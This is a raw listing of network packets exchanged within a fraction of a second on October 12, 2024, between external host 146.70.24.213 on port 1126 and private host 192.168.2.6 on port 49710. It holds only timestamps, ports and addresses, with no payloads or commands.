Oct 12, 2024 20:30:06.065740108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065752029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065773010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065783978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.065805912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065838099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.065856934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067099094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067152023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067153931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067188025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067240000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067272902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067286015 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067306042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067337036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067358017 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067368984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067377090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067642927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067676067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067709923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067730904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067760944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067795038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067811966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067836046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.067842960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067878008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067928076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067960978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.067970991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068011045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068038940 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068044901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068087101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068094015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068128109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068160057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068167925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068193913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068223000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068236113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068257093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068290949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068299055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068322897 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068356037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068389893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068402052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068423033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068449974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068471909 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068481922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068495989 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068516016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068547010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068591118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068598986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068630934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068654060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068665981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068698883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068731070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068743944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068763018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068798065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068808079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068826914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068836927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068861961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068895102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068907022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068928003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068962097 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.068974972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.068994999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.069057941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.153003931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153054953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153090000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153122902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153131008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.153156996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153182030 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.153189898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153224945 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153259993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.153285027 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.153301001 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.154412985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154464960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154499054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154532909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154562950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.154572010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154594898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.154609919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154647112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.154792070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155452013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155504942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155539989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155554056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155590057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155591965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155627012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155658960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155672073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155695915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155734062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155747890 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155769110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155832052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155864954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155879974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155900002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.155913115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.155956984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156006098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156012058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156044960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156076908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156100035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156131029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156162977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156199932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156212091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156234026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156244993 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156269073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156301022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156333923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156347036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156367064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156380892 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156402111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156434059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156460047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156470060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156505108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156514883 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156541109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156575918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156610012 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156622887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156642914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156676054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156682968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.156712055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.156724930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.157634020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157687902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157742023 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157742977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.157777071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157804966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.157809019 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157844067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157880068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.157908916 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.157938004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.157951117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158188105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158217907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158237934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158251047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158284903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158329964 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158334970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158369064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158401966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158416033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158444881 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158453941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158487082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158519983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158554077 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158564091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158586979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158606052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.158621073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158657074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.158708096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160090923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160142899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160144091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160176992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160224915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160240889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160294056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160341978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160429955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160463095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160514116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160562038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160564899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160598993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160631895 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160645008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160670042 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160715103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160720110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160767078 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160770893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160821915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160855055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160870075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160887957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160938025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.160943985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.160970926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161005020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161036015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161050081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161068916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161078930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161103964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161137104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161170006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161185980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161202908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161222935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161236048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161268950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161299944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161315918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161334991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161346912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161367893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161398888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161427975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161448956 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161459923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161475897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.161495924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161523104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.161566973 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.202519894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202574968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202600956 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.202610016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202647924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202680111 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.202685118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202722073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202756882 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.202769995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.202804089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.247332096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247378111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247461081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247497082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247503042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.247530937 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247560978 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.247574091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247607946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247627974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.247642994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.247811079 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250021935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250116110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250150919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250184059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250197887 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250219107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250251055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250252008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250288010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250303030 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250530005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250613928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250617981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250648022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250698090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250699997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250732899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250765085 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250797033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250811100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250847101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.250847101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250900030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250948906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.250986099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251000881 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251020908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251024961 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251055002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251106024 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251106977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251157999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251190901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251228094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251250029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251266003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251280069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251315117 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251435041 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251456022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251508951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251542091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251576900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251596928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251627922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251629114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251661062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251694918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251729965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251730919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251763105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251790047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251796961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251847029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251877069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251899958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251925945 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.251935005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.251971960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252006054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252032995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.252038956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252073050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252105951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.252125978 CEST	49710	1126	192.168.2.6	146.70.24.213
